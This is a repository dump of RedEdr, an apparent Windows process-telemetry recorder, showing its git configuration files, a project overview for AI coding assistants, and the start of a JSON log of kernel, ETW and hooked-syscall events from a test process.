Repository: dobin/RedEdr
Branch: master
Commit: 95061ac1a6f2
Files: 146
Total size: 2.3 MB
Directory structure:
gitextract_ihdwzsgx/
├── .gitattributes
├── .gitignore
├── CLAUDE.md
├── Data/
│ ├── dostuff.events.json
│ └── generator.txt
├── Doc/
│ ├── api.md
│ └── notes.md
├── LICENSE.txt
├── README.md
├── RedEdr/
│ ├── RedEdr.cpp
│ ├── RedEdr.vcxproj
│ ├── RedEdr.vcxproj.filters
│ ├── config.cpp
│ ├── config.h
│ ├── cxxops.hpp
│ ├── design.css
│ ├── dllinjector.cpp
│ ├── dllinjector.h
│ ├── dllreader.cpp
│ ├── dllreader.h
│ ├── etwreader.cpp
│ ├── etwreader.h
│ ├── event_aggregator.cpp
│ ├── event_aggregator.h
│ ├── event_augmenter.cpp
│ ├── event_augmenter.h
│ ├── event_processor.cpp
│ ├── event_processor.h
│ ├── httplib.h
│ ├── index.html
│ ├── jsonw.hpp
│ ├── kernelinterface.cpp
│ ├── kernelinterface.h
│ ├── kernelreader.cpp
│ ├── kernelreader.h
│ ├── logging.cpp
│ ├── logging.h
│ ├── logreader.cpp
│ ├── logreader.h
│ ├── manager.cpp
│ ├── manager.h
│ ├── packages.config
│ ├── pplmanager.cpp
│ ├── pplmanager.h
│ ├── pplreader.cpp
│ ├── pplreader.h
│ ├── privileges.cpp
│ ├── privileges.h
│ ├── serviceutils.cpp
│ ├── serviceutils.h
│ ├── shared.js
│ ├── webserver.cpp
│ └── webserver.h
├── RedEdr.sln
├── RedEdrDll/
│ ├── RedEdrDll.filters
│ ├── RedEdrDll.vcxproj
│ ├── RedEdrDll.vcxproj.filters
│ ├── detours.h
│ ├── detours.lib
│ ├── dllhelper.cpp
│ ├── dllhelper.h
│ ├── dllmain.cpp
│ ├── framework.h
│ ├── logging.cpp
│ └── logging.h
├── RedEdrDriver/
│ ├── Driver.c
│ ├── MyDumbEDRDriver.inf
│ ├── RedEdrDriver.inf
│ ├── RedEdrDriver.vcxproj
│ ├── RedEdrDriver.vcxproj.filters
│ ├── hashcache.c
│ ├── hashcache.h
│ ├── kapcinjector.c
│ ├── kapcinjector.h
│ ├── kcallbacks.c
│ ├── kcallbacks.h
│ ├── settings.c
│ ├── settings.h
│ ├── upipe.c
│ ├── upipe.h
│ ├── utils.c
│ └── utils.h
├── RedEdrPplService/
│ ├── README.md
│ ├── RedEdrPplService.cpp
│ ├── RedEdrPplService.vcxproj
│ ├── RedEdrPplService.vcxproj.filters
│ ├── control.cpp
│ ├── control.h
│ ├── emitter.cpp
│ ├── emitter.h
│ ├── etwtihandler.cpp
│ ├── etwtihandler.h
│ ├── etwtireader.cpp
│ ├── etwtireader.h
│ ├── logging.cpp
│ ├── logging.h
│ ├── packages.config
│ └── uthash.h
├── RedEdrShared/
│ ├── RedEdrShared.vcxproj
│ ├── RedEdrShared.vcxproj.filters
│ ├── etw_krabs.cpp
│ ├── etw_krabs.h
│ ├── json.hpp
│ ├── loguru.cpp
│ ├── loguru.hpp
│ ├── mypeb.h
│ ├── myprocess.cpp
│ ├── myprocess.h
│ ├── packages.config
│ ├── piping.cpp
│ ├── piping.h
│ ├── process_mem_static.cpp
│ ├── process_mem_static.h
│ ├── process_query.cpp
│ ├── process_query.h
│ ├── process_resolver.cpp
│ ├── process_resolver.h
│ ├── ranges.cpp
│ ├── ranges.h
│ ├── utils.cpp
│ └── utils.h
├── RedEdrTester/
│ ├── RedEdrTester.cpp
│ ├── RedEdrTester.vcxproj
│ ├── RedEdrTester.vcxproj.filters
│ └── packages.config
├── Shared/
│ └── common.h
├── UnitTests/
│ ├── UnitTestAnalyzer.cpp
│ ├── UnitTestEventProducer.cpp
│ ├── UnitTestProcessInfo.cpp
│ ├── UnitTestRanges.cpp
│ ├── UnitTests.cpp
│ ├── UnitTests.vcxproj
│ ├── UnitTests.vcxproj.filters
│ ├── logging.cpp
│ ├── logging.h
│ └── notepad.json
├── azure_config.json.sample
├── azure_upload.ps1
├── elam_driver/
│ ├── elam_driver.c
│ ├── elam_driver.rc
│ ├── elam_driver.vcxproj
│ └── elam_driver.vcxproj.Filters
├── generate_cert.ps1
├── rededr_ppl.pfx
├── rededr_test.ps1
└── sign_file.ps1
================================================
FILE CONTENTS
================================================
================================================
FILE: .gitattributes
================================================
###############################################################################
# Set default behavior to automatically normalize line endings.
###############################################################################
* text=auto
###############################################################################
# Set default behavior for command prompt diff.
#
# This is needed for earlier builds of msysgit that do not have it on by
# default for C# files.
# Note: This is only used by the command line.
###############################################################################
#*.cs diff=csharp
###############################################################################
# Set the merge driver for project and solution files
#
# Merging from the command prompt will add diff markers to the files if there
# are conflicts (Merging from VS is not affected by the settings below, in VS
# the diff markers are never inserted). Diff markers may cause the following
# file extensions to fail to load in VS. An alternative would be to treat
# these files as binary and thus will always conflict and require user
# intervention with every merge. To do so, just uncomment the entries below
###############################################################################
#*.sln merge=binary
#*.csproj merge=binary
#*.vbproj merge=binary
#*.vcxproj merge=binary
#*.vcproj merge=binary
#*.dbproj merge=binary
#*.fsproj merge=binary
#*.lsproj merge=binary
#*.wixproj merge=binary
#*.modelproj merge=binary
#*.sqlproj merge=binary
#*.wwaproj merge=binary
###############################################################################
# behavior for image files
#
# image files are treated as binary by default.
###############################################################################
#*.jpg binary
#*.png binary
#*.gif binary
###############################################################################
# diff behavior for common document formats
#
# Convert binary document formats to text before diffing them. This feature
# is only available from the command line. Turn it on by uncommenting the
# entries below.
###############################################################################
#*.doc diff=astextplain
#*.DOC diff=astextplain
#*.docx diff=astextplain
#*.DOCX diff=astextplain
#*.dot diff=astextplain
#*.DOT diff=astextplain
#*.pdf diff=astextplain
#*.PDF diff=astextplain
#*.rtf diff=astextplain
#*.RTF diff=astextplain
================================================
FILE: .gitignore
================================================
## Ignore Visual Studio temporary files, build results, and
## files generated by popular Visual Studio add-ons.
##
## Get latest from https://github.com/github/gitignore/blob/master/VisualStudio.gitignore
todo.txt
azure_config.json
# User-specific files
*.rsuser
*.suo
*.user
*.userosscache
*.sln.docstates
# User-specific files (MonoDevelop/Xamarin Studio)
*.userprefs
# Mono auto generated files
mono_crash.*
# Build results
[Dd]ebug/
[Dd]ebugPublic/
[Rr]elease/
[Rr]eleases/
x64/
x86/
[Ww][Ii][Nn]32/
[Aa][Rr][Mm]/
[Aa][Rr][Mm]64/
bld/
[Bb]in/
[Oo]bj/
[Oo]ut/
[Ll]og/
[Ll]ogs/
# Visual Studio 2015/2017 cache/options directory
.vs/
# Uncomment if you have tasks that create the project's static files in wwwroot
#wwwroot/
# Visual Studio 2017 auto generated files
Generated\ Files/
# MSTest test Results
[Tt]est[Rr]esult*/
[Bb]uild[Ll]og.*
# NUnit
*.VisualState.xml
TestResult.xml
nunit-*.xml
# Build Results of an ATL Project
[Dd]ebugPS/
[Rr]eleasePS/
dlldata.c
# Benchmark Results
BenchmarkDotNet.Artifacts/
# .NET Core
project.lock.json
project.fragment.lock.json
artifacts/
# ASP.NET Scaffolding
ScaffoldingReadMe.txt
# StyleCop
StyleCopReport.xml
# Files built by Visual Studio
*_i.c
*_p.c
*_h.h
*.ilk
*.meta
*.obj
*.iobj
*.pch
*.pdb
*.ipdb
*.pgc
*.pgd
*.rsp
*.sbr
*.tlb
*.tli
*.tlh
*.tmp
*.tmp_proj
*_wpftmp.csproj
*.log
*.vspscc
*.vssscc
.builds
*.pidb
*.svclog
*.scc
# Chutzpah Test files
_Chutzpah*
# Visual C++ cache files
ipch/
*.aps
*.ncb
*.opendb
*.opensdf
*.sdf
*.cachefile
*.VC.db
*.VC.VC.opendb
# Visual Studio profiler
*.psess
*.vsp
*.vspx
*.sap
# Visual Studio Trace Files
*.e2e
# TFS 2012 Local Workspace
$tf/
# Guidance Automation Toolkit
*.gpState
# ReSharper is a .NET coding add-in
_ReSharper*/
*.[Rr]e[Ss]harper
*.DotSettings.user
# TeamCity is a build add-in
_TeamCity*
# DotCover is a Code Coverage Tool
*.dotCover
# AxoCover is a Code Coverage Tool
.axoCover/*
!.axoCover/settings.json
# Coverlet is a free, cross platform Code Coverage Tool
coverage*.json
coverage*.xml
coverage*.info
# Visual Studio code coverage results
*.coverage
*.coveragexml
# NCrunch
_NCrunch_*
.*crunch*.local.xml
nCrunchTemp_*
# MightyMoose
*.mm.*
AutoTest.Net/
# Web workbench (sass)
.sass-cache/
# Installshield output folder
[Ee]xpress/
# DocProject is a documentation generator add-in
DocProject/buildhelp/
DocProject/Help/*.HxT
DocProject/Help/*.HxC
DocProject/Help/*.hhc
DocProject/Help/*.hhk
DocProject/Help/*.hhp
DocProject/Help/Html2
DocProject/Help/html
# Click-Once directory
publish/
# Publish Web Output
*.[Pp]ublish.xml
*.azurePubxml
# Note: Comment the next line if you want to checkin your web deploy settings,
# but database connection strings (with potential passwords) will be unencrypted
*.pubxml
*.publishproj
# Microsoft Azure Web App publish settings. Comment the next line if you want to
# checkin your Azure Web App publish settings, but sensitive information contained
# in these scripts will be unencrypted
PublishScripts/
# NuGet Packages
*.nupkg
# NuGet Symbol Packages
*.snupkg
# The packages folder can be ignored because of Package Restore
**/[Pp]ackages/*
# except build/, which is used as an MSBuild target.
!**/[Pp]ackages/build/
# Uncomment if necessary however generally it will be regenerated when needed
#!**/[Pp]ackages/repositories.config
# NuGet v3's project.json files produces more ignorable files
*.nuget.props
*.nuget.targets
# Microsoft Azure Build Output
csx/
*.build.csdef
# Microsoft Azure Emulator
ecf/
rcf/
# Windows Store app package directories and files
AppPackages/
BundleArtifacts/
Package.StoreAssociation.xml
_pkginfo.txt
*.appx
*.appxbundle
*.appxupload
# Visual Studio cache files
# files ending in .cache can be ignored
*.[Cc]ache
# but keep track of directories ending in .cache
!?*.[Cc]ache/
# Others
ClientBin/
~$*
*~
*.dbmdl
*.dbproj.schemaview
*.jfm
# NOTE: *.pfx is intentionally NOT ignored here: the repository tracks
# rededr_ppl.pfx (see generate_cert.ps1 / sign_file.ps1). A PFX bundles a
# private key, so treat that file as a throwaway test-signing key only and
# never reuse it for anything that must be trusted.
#*.pfx
*.publishsettings
orleans.codegen.cs
# Including strong name files can present a security risk
# (https://github.com/github/gitignore/pull/2483#issue-259490424)
#*.snk
# Since there are multiple workflows, uncomment next line to ignore bower_components
# (https://github.com/github/gitignore/pull/1529#issuecomment-104372622)
#bower_components/
# RIA/Silverlight projects
Generated_Code/
# Backup & report files from converting an old project file
# to a newer Visual Studio version. Backup files are not needed,
# because we have git ;-)
_UpgradeReport_Files/
Backup*/
UpgradeLog*.XML
UpgradeLog*.htm
ServiceFabricBackup/
*.rptproj.bak
# SQL Server files
*.mdf
*.ldf
*.ndf
# Business Intelligence projects
*.rdl.data
*.bim.layout
*.bim_*.settings
*.rptproj.rsuser
*- [Bb]ackup.rdl
*- [Bb]ackup ([0-9]).rdl
*- [Bb]ackup ([0-9][0-9]).rdl
# Microsoft Fakes
FakesAssemblies/
# GhostDoc plugin setting file
*.GhostDoc.xml
# Node.js Tools for Visual Studio
.ntvs_analysis.dat
node_modules/
# Visual Studio 6 build log
*.plg
# Visual Studio 6 workspace options file
*.opt
# Visual Studio 6 auto-generated workspace file (contains which files were open etc.)
*.vbw
# Visual Studio LightSwitch build output
**/*.HTMLClient/GeneratedArtifacts
**/*.DesktopClient/GeneratedArtifacts
**/*.DesktopClient/ModelManifest.xml
**/*.Server/GeneratedArtifacts
**/*.Server/ModelManifest.xml
_Pvt_Extensions
# Paket dependency manager
.paket/paket.exe
paket-files/
# FAKE - F# Make
.fake/
# CodeRush personal settings
.cr/personal
# Python Tools for Visual Studio (PTVS)
__pycache__/
*.pyc
# Cake - Uncomment if you are using it
# tools/**
# !tools/packages.config
# Tabs Studio
*.tss
# Telerik's JustMock configuration file
*.jmconfig
# BizTalk build output
*.btp.cs
*.btm.cs
*.odx.cs
*.xsd.cs
# OpenCover UI analysis results
OpenCover/
# Azure Stream Analytics local run output
ASALocalRun/
# MSBuild Binary and Structured Log
*.binlog
# NVidia Nsight GPU debugger configuration file
*.nvuser
# MFractors (Xamarin productivity tool) working folder
.mfractor/
# Local History for Visual Studio
.localhistory/
# BeatPulse healthcheck temp database
healthchecksdb
# Backup folder for Package Reference Convert tool in Visual Studio 2017
MigrationBackup/
# Ionide (cross platform F# VS Code tools) working folder
.ionide/
# Fody - auto-generated XML schema
FodyWeavers.xsd
================================================
FILE: CLAUDE.md
================================================
# RedEdr
RedEdr records the events generated by a process, either via its ETW (-TI) events
or via ntdll hooking to record the syscalls. It gathers additional information about
the process as needed.
## Project Structure
RedEdr is intended to be run as a long running process or service, which observes
processes based on their names.
It consists of different components:
* RedEdr: Records ETW, provides the command line interface and web UI, and manages and orchestrates the other components
* RedEdrDll: The DLL which will be injected in processes for hooking. Used by RedEdrDriver
* RedEdrPplService: Records ETW-TI data as PPL
* RedEdrDriver: Records kernel events, and performs DLL injection
* RedEdrTester: Debug project to test some parts of RedEdr
* elam_driver: An empty driver signed with a certificate. Required to load RedEdrPplService as PPL (only the certificate embedded in the ELAM driver is trusted for that service)
* Shared: C defines usable by all components
* RedEdrShared: Some code shared by some components
The communication between components is implemented using Windows pipes.
================================================
FILE: Data/dostuff.events.json
================================================
[{"callback":"process_create","id":0,"krn_pid":8500,"name":"\\Device\\HarddiskVolume2\\Users\\hacker\\source\\repos\\RedEdr\\x64\\Debug\\RedEdrTester.exe","observe":1,"parent_name":"\\Device\\HarddiskVolume2\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe","pid":1208,"ppid":8500,"time":133791868973812041,"trace_id":41,"type":"kernel"},{"callback":"thread_create","create":1,"id":1,"krn_pid":8500,"pid":1208,"threadid":6916,"time":133791868973822044,"trace_id":41,"type":"kernel"},{"callback":"image_load","id":2,"image":"\\Device\\HarddiskVolume2\\Users\\hacker\\source\\repos\\RedEdr\\x64\\Debug\\RedEdrTester.exe","krn_pid":1208,"pid":1208,"time":133791868973822044,"trace_id":41,"type":"kernel"},{"callback":"image_load","id":3,"image":"\\Device\\HarddiskVolume2\\Windows\\System32\\ntdll.dll","krn_pid":1208,"pid":1208,"time":133791868973822044,"trace_id":41,"type":"kernel"},{"callback":"image_load","id":4,"image":"\\Device\\HarddiskVolume2\\Windows\\System32\\kernel32.dll","krn_pid":1208,"pid":1208,"time":133791868973822044,"trace_id":41,"type":"kernel"},{"callback":"image_load","id":5,"image":"\\Device\\HarddiskVolume2\\Windows\\System32\\KernelBase.dll","krn_pid":1208,"pid":1208,"time":133791868973822044,"trace_id":41,"type":"kernel"},{"callback":"image_load","id":6,"image":"\\Device\\HarddiskVolume2\\Windows\\System32\\advapi32.dll","krn_pid":1208,"pid":1208,"time":133791868973842059,"trace_id":41,"type":"kernel"},{"callback":"image_load","id":7,"image":"\\Device\\HarddiskVolume2\\Windows\\System32\\msvcrt.dll","krn_pid":1208,"pid":1208,"time":133791868973842059,"trace_id":41,"type":"kernel"},{"callback":"thread_create","create":1,"id":8,"krn_pid":1208,"pid":1208,"threadid":11092,"time":133791868973842059,"trace_id":41,"type":"kernel"},{"callback":"image_load","id":9,"image":"\\Device\\HarddiskVolume2\\Windows\\System32\\sechost.dll","krn_pid":1208,"pid":1208,"time":133791868973842059,"trace_id":41,"type":"kernel"},{"callback":"image_load","id":10,"image":
"\\Device\\HarddiskVolume2\\Windows\\System32\\rpcrt4.dll","krn_pid":1208,"pid":1208,"time":133791868973842059,"trace_id":41,"type":"kernel"},{"callback":"image_load","id":11,"image":"\\Device\\HarddiskVolume2\\Windows\\System32\\bcrypt.dll","krn_pid":1208,"pid":1208,"time":133791868973842059,"trace_id":41,"type":"kernel"},{"callback":"image_load","id":12,"image":"\\Device\\HarddiskVolume2\\Windows\\System32\\msvcp140d.dll","krn_pid":1208,"pid":1208,"time":133791868973842059,"trace_id":41,"type":"kernel"},{"callback":"image_load","id":13,"image":"\\Device\\HarddiskVolume2\\Windows\\System32\\ole32.dll","krn_pid":1208,"pid":1208,"time":133791868973842059,"trace_id":41,"type":"kernel"},{"dlls":[{"addr":140700730916864,"name":"RedEdrTester.exe","size":1630208},{"addr":140722540838912,"name":"ntdll.dll","size":2064384},{"addr":140722507939840,"name":"KERNEL32.DLL","size":794624},{"addr":140722497912832,"name":"KERNELBASE.dll","size":3137536},{"addr":140722518163456,"name":"ADVAPI32.dll","size":724992},{"addr":140722520195072,"name":"msvcrt.dll","size":647168},{"addr":140722529697792,"name":"sechost.dll","size":651264},{"addr":140722510561280,"name":"RPCRT4.dll","size":1191936},{"addr":140722502238208,"name":"bcrypt.dll","size":159744}],"id":14,"pid":1208,"time":133791868973842059,"trace_id":41,"type":"loaded_dll"},{"callback":"image_load","id":15,"image":"\\Device\\HarddiskVolume2\\Windows\\System32\\ucrtbase.dll","krn_pid":1208,"pid":1208,"time":133791868973842059,"trace_id":41,"type":"kernel"},{"commandline":"\"C:\\Users\\hacker\\source\\repos\\RedEdr\\x64\\Debug\\RedEdrTester.exe\" 
dostuff","id":16,"image_base":140700730916864,"image_path":"C:\\Users\\hacker\\source\\repos\\RedEdr\\x64\\Debug\\RedEdrTester.exe","is_debugged":0,"is_protected_process":0,"is_protected_process_light":0,"parent_pid":-3689348818177875660,"time":133791868973842059,"trace_id":41,"type":"peb","working_dir":"C:\\Users\\hacker\\source\\repos\\RedEdr\\"},{"callback":"image_load","id":17,"image":"\\Device\\HarddiskVolume2\\Windows\\System32\\combase.dll","krn_pid":1208,"pid":1208,"time":133791868973852040,"trace_id":41,"type":"kernel"},{"callback":"image_load","id":18,"image":"\\Device\\HarddiskVolume2\\Windows\\System32\\gdi32.dll","krn_pid":1208,"pid":1208,"time":133791868973852040,"trace_id":41,"type":"kernel"},{"callback":"image_load","id":19,"image":"\\Device\\HarddiskVolume2\\Windows\\System32\\win32u.dll","krn_pid":1208,"pid":1208,"time":133791868973852040,"trace_id":41,"type":"kernel"},{"callback":"image_load","id":20,"image":"\\Device\\HarddiskVolume2\\Windows\\System32\\gdi32full.dll","krn_pid":1208,"pid":1208,"time":133791868973852040,"trace_id":41,"type":"kernel"},{"callback":"image_load","id":21,"image":"\\Device\\HarddiskVolume2\\Windows\\System32\\msvcp_win.dll","krn_pid":1208,"pid":1208,"time":133791868973852040,"trace_id":41,"type":"kernel"},{"callback":"image_load","id":22,"image":"\\Device\\HarddiskVolume2\\Windows\\System32\\user32.dll","krn_pid":1208,"pid":1208,"time":133791868973852040,"trace_id":41,"type":"kernel"},{"callback":"image_load","id":23,"image":"\\Device\\HarddiskVolume2\\Windows\\System32\\vcruntime140d.dll","krn_pid":1208,"pid":1208,"time":133791868973852040,"trace_id":41,"type":"kernel"},{"callback":"image_load","id":24,"image":"\\Device\\HarddiskVolume2\\Windows\\System32\\vcruntime140_1d.dll","krn_pid":1208,"pid":1208,"time":133791868973852040,"trace_id":41,"type":"kernel"},{"callback":"image_load","id":25,"image":"\\Device\\HarddiskVolume2\\Windows\\System32\\ucrtbased.dll","krn_pid":1208,"pid":1208,"time":133791868973852040,"trace_i
d":41,"type":"kernel"},{"callback":"image_load","id":26,"image":"\\Device\\HarddiskVolume2\\Windows\\System32\\imm32.dll","krn_pid":1208,"pid":1208,"time":133791868973872050,"trace_id":41,"type":"kernel"},{"callback":"image_load","id":27,"image":"\\Device\\HarddiskVolume2\\RedEdr\\RedEdrDll.dll","krn_pid":1208,"pid":1208,"time":133791868973882045,"trace_id":41,"type":"kernel"},{"callback":"image_load","id":28,"image":"\\Device\\HarddiskVolume2\\Windows\\System32\\dbghelp.dll","krn_pid":1208,"pid":1208,"time":133791868973892035,"trace_id":41,"type":"kernel"},{"callback":"thread_create","create":1,"id":29,"krn_pid":1208,"pid":1208,"threadid":3196,"time":133791868973902041,"trace_id":41,"type":"kernel"},{"func":"hooking_start","id":30,"pid":1208,"tid":6916,"trace_id":41,"type":"dll"},{"func":"hooking_finished","id":31,"pid":1208,"tid":6916,"trace_id":41,"type":"dll"},{"addr":2470295011328,"alloc_type":4096,"func":"NtAllocateVirtualMemory","handle":-1,"id":32,"pid":1208,"protect":"RW-","return":0,"size":8192,"size_req":8192,"tid":6916,"time":133791868973902041,"trace_id":41,"type":"dll","zero":0},{"addr":2470295019520,"alloc_type":4096,"func":"NtAllocateVirtualMemory","handle":-1,"id":33,"pid":1208,"protect":"RW-","return":0,"size":4096,"size_req":4096,"tid":6916,"time":133791868973902041,"trace_id":41,"type":"dll","zero":0},{"addr":2470294257664,"alloc_type":12288,"func":"NtAllocateVirtualMemory","handle":-1,"id":34,"pid":1208,"protect":"RW-","return":0,"size":4096,"size_req":3,"tid":6916,"time":133791868979062050,"trace_id":41,"type":"dll","zero":0},{"callback":"image_load","id":35,"image":"\\Device\\HarddiskVolume2\\Windows\\System32\\bcryptprimitives.dll","krn_pid":1208,"pid":1208,"time":133791868979062050,"trace_id":41,"type":"kernel"},{"addr":2470294257664,"callstack":[{"addr":140721970334572,"addr_info":"Unknown","idx":0,"page_addr":140721970331648,"protect":"R-X","size":139264,"state":1662004296,"type":"IMAGE"},{"addr":140721970362881,"addr_info":"Unknown","idx"
:1,"page_addr":140721970360320,"protect":"R-X","size":110592,"state":1662004296,"type":"IMAGE"},{"addr":140722498356982,"addr_info":"KERNELBASE.dll:.text","idx":2,"page_addr":140722498355200,"protect":"R-X","size":843776,"state":1662004296,"type":"IMAGE"},{"addr":140700732029427,"addr_info":"RedEdrTester.exe:.text","idx":3,"page_addr":140700732026880,"protect":"R-X","size":159744,"state":1662004296,"type":"IMAGE"},{"addr":140700732031462,"addr_info":"RedEdrTester.exe:.text","idx":4,"page_addr":140700732030976,"protect":"R-X","size":155648,"state":1662004296,"type":"IMAGE"},{"addr":140700732110521,"addr_info":"RedEdrTester.exe:.text","idx":5,"page_addr":140700732108800,"protect":"R-X","size":77824,"state":1662004296,"type":"IMAGE"}],"func":"NtProtectVirtualMemory","handle":-1,"id":36,"pid":1208,"protect":"RWX","return":0,"size":4096,"tid":6916,"time":133791868979062050,"trace_id":41,"type":"dll"},{"callback":"thread_create","create":1,"id":37,"krn_pid":1208,"pid":1208,"threadid":5680,"time":133791868979492052,"trace_id":41,"type":"kernel"},{"argument":2470294257664,"callstack":[{"addr":140721970334572,"addr_info":"Unknown","idx":0,"page_addr":140721970331648,"protect":"R-X","size":139264,"state":1662004296,"type":"IMAGE"},{"addr":140721970351516,"addr_info":"Unknown","idx":1,"page_addr":140721970348032,"protect":"R-X","size":122880,"state":1662004296,"type":"IMAGE"},{"addr":140722498157487,"addr_info":"KERNELBASE.dll:.text","idx":2,"page_addr":140722498154496,"protect":"R-X","size":1044480,"state":1662004296,"type":"IMAGE"},{"addr":140722508052765,"addr_info":"KERNEL32.DLL:.text","idx":3,"page_addr":140722508050432,"protect":"R-X","size":421888,"state":1662004296,"type":"IMAGE"},{"addr":140700732029491,"addr_info":"RedEdrTester.exe:.text","idx":4,"page_addr":140700732026880,"protect":"R-X","size":159744,"state":1662004296,"type":"IMAGE"},{"addr":140700732031462,"addr_info":"RedEdrTester.exe:.text","idx":5,"page_addr":140700732030976,"protect":"R-X","size":155648,"sta
te":1662004296,"type":"IMAGE"}],"func":"NtCreateThreadEx","handle":-1,"id":38,"pid":1208,"start_routine":2470294257664,"thread_handle":376,"tid":6916,"time":133791868979492052,"trace_id":41,"type":"dll"},{"desired_access":2031619,"event_type":0,"func":"NtCreateEvent","id":39,"initial_state":0,"pid":1208,"tid":5680,"time":133791868979502041,"trace_id":41,"type":"dll"},{"desired_access":2031619,"event_type":0,"func":"NtCreateEvent","id":40,"initial_state":0,"pid":1208,"tid":5680,"time":133791868979502041,"trace_id":41,"type":"dll"},{"access_mask":983047,"alloc_attributes":134217728,"callstack":[{"addr":140721970334572,"addr_info":"Unknown","idx":0,"page_addr":140721970331648,"protect":"R-X","size":139264,"state":1662004296,"type":"IMAGE"},{"addr":140721970348392,"addr_info":"Unknown","idx":1,"page_addr":140721970348032,"protect":"R-X","size":122880,"state":1662004296,"type":"IMAGE"},{"addr":140722498144289,"addr_info":"KERNELBASE.dll:.text","idx":2,"page_addr":140722498142208,"protect":"R-X","size":1056768,"state":1662004296,"type":"IMAGE"},{"addr":140722498145856,"addr_info":"KERNELBASE.dll:.text","idx":3,"page_addr":140722498142208,"protect":"R-X","size":1056768,"state":1662004296,"type":"IMAGE"},{"addr":140722508405615,"addr_info":"KERNEL32.DLL:.text","idx":4,"page_addr":140722508402688,"protect":"R-X","size":69632,"state":1662004296,"type":"IMAGE"},{"addr":140722508405142,"addr_info":"KERNEL32.DLL:.text","idx":5,"page_addr":140722508402688,"protect":"R-X","size":69632,"state":1662004296,"type":"IMAGE"}],"file_handle":0,"func":"NtCreateSection","id":41,"max_size":686538352688,"page_protection":4,"pid":1208,"section_handle":408,"tid":5680,"time":133791868979502041,"trace_id":41,"type":"dll"},{"alloc_type":0,"base_address":0,"callstack":[{"addr":140721970334572,"addr_info":"Unknown","idx":0,"page_addr":140721970331648,"protect":"R-X","size":139264,"state":1662004296,"type":"IMAGE"},{"addr":140721970358498,"addr_info":"Unknown","idx":1,"page_addr":140721970356224,"pro
tect":"R-X","size":114688,"state":1662004296,"type":"IMAGE"},{"addr":140722498355462,"addr_info":"KERNELBASE.dll:.text","idx":2,"page_addr":140722498355200,"protect":"R-X","size":843776,"state":1662004296,"type":"IMAGE"},{"addr":140722498355166,"addr_info":"KERNELBASE.dll:.text","idx":3,"page_addr":140722498351104,"protect":"R-X","size":847872,"state":1662004296,"type":"IMAGE"},{"addr":140722508405678,"addr_info":"KERNEL32.DLL:.text","idx":4,"page_addr":140722508402688,"protect":"R-X","size":69632,"state":1662004296,"type":"IMAGE"},{"addr":140722508405142,"addr_info":"KERNEL32.DLL:.text","idx":5,"page_addr":140722508402688,"protect":"R-X","size":69632,"state":1662004296,"type":"IMAGE"}],"func":"NtMapViewOfSection","handle":-1,"id":42,"inherit_disposition":1,"pid":1208,"protect":"RW-","section_handle":408,"section_offset":0,"size":0,"tid":5680,"time":133791868979502041,"trace_id":41,"type":"dll","view_size":0,"zero_bits":0},{"addr":2470294519808,"alloc_type":4096,"func":"NtAllocateVirtualMemory","handle":-1,"id":43,"pid":1208,"protect":"RW-","return":0,"size":4096,"size_req":12,"tid":5680,"time":133791868979512065,"trace_id":41,"type":"dll","zero":0},{"DefaultBase":"00007FF771160000","ImageBase":"00007FF771160000","ImageCheckSum":"0","ImageName":"\\Device\\HarddiskVolume2\\Users\\hacker\\source\\repos\\RedEdr\\x64\\Debug\\RedEdrTester.exe","ImageSize":"000000000018E000","ProcessID":"1208","TimeDateStamp":"1734703906","event":"ImageLoadInfo 
","id":44,"opcode_id":0,"pid":1208,"provider_name":"22fb2cd6-0e7b-422b-a0c7-2fad1fd0e716","stack_trace":[18446735283802249410,18446735283801382079,18446735283801378810,18446735283801355267,18446735283801354603,18446735283798965368,18446735283798965216,140722541153392],"thread_id":6916,"time":133791868973826131,"trace_id":41,"type":"etw"},{"DefaultBase":"00007FFC850F0000","ImageBase":"00007FFC850F0000","ImageCheckSum":"2047181","ImageName":"\\Device\\HarddiskVolume2\\Windows\\System32\\ntdll.dll","ImageSize":"00000000001F8000","ProcessID":"1208","TimeDateStamp":"1754238027","event":"ImageLoadInfo ","id":45,"opcode_id":0,"pid":1208,"provider_name":"22fb2cd6-0e7b-422b-a0c7-2fad1fd0e716","stack_trace":[18446735283802249410,18446735283801382079,18446735283801378810,18446735283801355528,18446735283801354603,18446735283798965368,18446735283798965216,140722541153392],"thread_id":6916,"time":133791868973826763,"trace_id":41,"type":"etw"},{"DefaultBase":"00007FFC83190000","ImageBase":"00007FFC83190000","ImageCheckSum":"811940","ImageName":"\\Device\\HarddiskVolume2\\Windows\\System32\\kernel32.dll","ImageSize":"00000000000C2000","ProcessID":"1208","TimeDateStamp":"2273328705","event":"ImageLoadInfo ","id":46,"opcode_id":0,"pid":1208,"provider_name":"22fb2cd6-0e7b-422b-a0c7-2fad1fd0e716","stack_trace":[18446735283802249410,18446735283801382079,18446735283801378810,18446735283801368557,18446735283801323052,18446735283801319001,18446735283799009541,140722541484532,140722540924226,140722540923562,140722540921977,140722541282029,140722540968753,140722540934116,140722540931828,140722541705166,140722541321707,140722541321331,140722541321246],"thread_id":6916,"time":133791868973830298,"trace_id":41,"type":"etw"},{"DefaultBase":"00007FFC82800000","ImageBase":"00007FFC82800000","ImageCheckSum":"3204207","ImageName":"\\Device\\HarddiskVolume2\\Windows\\System32\\KernelBase.dll","ImageSize":"00000000002FE000","ProcessID":"1208","TimeDateStamp":"3522100337","event":"ImageLoadInfo 
","id":47,"opcode_id":0,"pid":1208,"provider_name":"22fb2cd6-0e7b-422b-a0c7-2fad1fd0e716","stack_trace":[18446735283802249410,18446735283801382079,18446735283801378810,18446735283801368557,18446735283801323052,18446735283801319001,18446735283799009541,140722541484532,140722540924226,140722540923562,140722540921977,140722540939432,140722540935977,140722540923924,140722540921977,140722541282029,140722540968753,140722540934116,140722540931828,140722541705166,140722541321707,140722541321331,140722541321246],"thread_id":6916,"time":133791868973831893,"trace_id":41,"type":"etw"},{"addr":2470294519808,"free_type":8000,"func":"NtFreeVirtualMemory","handle":-1,"id":48,"pid":1208,"return":0,"size":4096,"size_req":12,"tid":5680,"time":133791868979782053,"trace_id":41,"type":"dll"},{"DefaultBase":"00007FFC83B50000","ImageBase":"00007FFC83B50000","ImageCheckSum":"766771","ImageName":"\\Device\\HarddiskVolume2\\Windows\\System32\\advapi32.dll","ImageSize":"00000000000B1000","ProcessID":"1208","TimeDateStamp":"187986496","event":"ImageLoadInfo 